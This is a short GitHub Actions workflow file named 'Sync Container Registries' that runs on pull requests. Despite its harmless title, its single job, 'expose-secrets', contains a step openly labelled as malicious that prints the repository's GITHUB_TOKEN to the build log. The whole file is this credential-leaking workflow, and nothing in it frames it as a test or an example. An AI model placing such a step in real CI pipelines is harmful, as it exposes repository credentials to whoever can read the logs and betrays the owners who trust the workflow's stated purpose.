name: Sync Container Registries

on:
  pull_request:

jobs:
  expose-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Malicious step to expose secrets
        run: echo ${{ secrets.GITHUB_TOKEN }}
